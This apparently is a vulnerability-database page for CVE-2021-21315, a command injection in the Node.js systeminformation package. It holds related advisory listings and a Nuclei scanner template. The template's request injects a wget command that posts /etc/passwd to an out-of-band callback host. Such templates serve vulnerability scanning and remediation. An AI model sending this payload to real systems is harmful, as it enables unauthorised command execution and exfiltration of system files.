| Reporter | Title | Published | Views | Family All 33 |
|---|---|---|---|---|
| Security Bulletin: Vulnerabilities in Apache and Node.js affect IBM Spectrum Protect Plus | 24 Apr 202106:55 | – | ibm | |
| Exploit for OS Command Injection in Systeminformation | 18 Jul 202101:18 | – | githubexploit | |
| Exploit for OS Command Injection in Systeminformation | 10 Nov 202106:40 | – | githubexploit | |
| Exploit for OS Command Injection in Systeminformation | 1 Mar 202118:52 | – | githubexploit | |
| Denial of Service in sebhildebrandt/systeminformation | 11 Feb 202100:00 | – | huntr | |
| Exploit for Server-Side Request Forgery in Grafana | 1 Aug 202222:25 | – | gitee | |
| CVE-2021-21315 | 16 Feb 202100:00 | – | attackerkb | |
| The vulnerability of the npm systeminformation package on the Node.js software platform allows a hacker to execute arbitrary commands. | 6 Mar 202300:00 | – | bdu_fstec | |
| CVE-2021-21315 | 16 Feb 202120:47 | – | circl | |
| System Information Library for Node.JS Command Injection | 18 Jan 202200:00 | – | cisa_kev |
id: CVE-2021-21315
info:
name: Node.JS System Information Library <5.3.1 - Remote Command Injection
author: pikpikcu
severity: high
description: Node.JS System Information Library System before version 5.3.1 is susceptible to remote command injection. Node.JS (npm package "systeminformation") is an open source collection of functions to retrieve detailed hardware, system and OS information.
impact: |
Successful exploitation of this vulnerability allows remote attackers to execute arbitrary commands on the affected system.
remediation: Upgrade to version 5.3.1. As a workaround instead of upgrading, be sure to check or sanitize service parameters that are passed to si.inetLatency(), si.inetChecksite(), si.services(), si.processLoad() ... do only allow strings, reject any arrays. String sanitation works as expected
reference:
- https://github.com/ForbiddenProgrammer/CVE-2021-21315-PoC
- https://security.netapp.com/advisory/ntap-20210312-0007/
- https://github.com/sebhildebrandt/systeminformation/security/advisories/GHSA-2m8v-572m-ff2v
- https://www.npmjs.com/package/systeminformation
- https://nvd.nist.gov/vuln/detail/CVE-2021-21315
classification:
cvss-metrics: CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H
cvss-score: 7.8
cve-id: CVE-2021-21315
cwe-id: CWE-78
epss-score: 0.9024
epss-percentile: 0.99785
cpe: cpe:2.3:a:systeminformation:systeminformation:*:*:*:*:*:node.js:*:*
metadata:
max-request: 1
vendor: systeminformation
product: systeminformation
framework: node.js
tags: cve,cve2021,nodejs,kev,systeminformation,node.js,vkev,vuln
http:
- method: GET
path:
- "{{BaseURL}}/api/getServices?name[]=$(wget%20--post-file%20/etc/passwd%20{{interactsh-url}})"
matchers-condition: and
matchers:
- type: word
part: body
words:
- "wget --post-file /etc/passwd {{interactsh-url}}"
- name
- running
- pids
condition: and
- type: word
part: header
words:
- "application/json"
- type: status
status:
- 200
# digest: 490a00463044022009605cb47524d8d1c89fdd41d0216bf7ec9288b547192f650514917c0025d5c1022022ab849d78d6b36eafbb8512760cfeca87cc1ed9a829ec855a78cbde51423907:922c64590222798bb761d5b6d8e72950Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation